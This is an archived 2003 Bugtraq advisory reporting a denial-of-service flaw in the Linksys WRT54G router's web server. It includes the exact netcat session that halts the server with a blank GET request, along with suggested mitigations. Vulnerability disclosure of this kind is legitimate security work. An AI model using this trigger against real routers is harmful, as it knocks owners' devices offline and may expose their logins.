Linksys WRT54G Denial of Service Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Linksys WRT54G Denial of Service Vulnerability
From: <test@xxxxxxxxxxxxxxx>
Date: 3 Dec 2003 22:35:26 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Linksys WRT54G Denial of Service Vulnerability



System(s)
===========

Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)


Detail(s)
===========

Sending a blank GET request to the router on port 80 (or 8080) halts the 
embedded webserver.  This may allow an attacker to force the owner to reboot 
the router, allowing them to gain sensitive information during router 
authentication.

Exploitation
============

user@test:~$ nc 10.0.0.1 80
GET
user@test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user@test:~$

Solution(s)
============

- Https service should continue running for remote      access.
- Scan for sniffers that might be on the network before rebooting and 
performing any authentication.
- Wait for a vendor patch :)

Status
============

Vendor contacted on 12/03/03.


!HAPPY HOLIDAYS!
carbon@xxxxxxxxxxxxxxx - 12/02/03

Follow-Ups:
- Re: Linksys WRT54G Denial of Service Vulnerability
  - From: Michael Renzmann

Prev by Date: Multiple OpenSSH/OpenSSL Vulnerabilities Update on IRIX
Next by Date: Re: [ANNOUNCE] glibc heap protection patch
Previous by thread: Multiple OpenSSH/OpenSSL Vulnerabilities Update on IRIX
Next by thread: Re: Linksys WRT54G Denial of Service Vulnerability
Index(es):
- Date
- Thread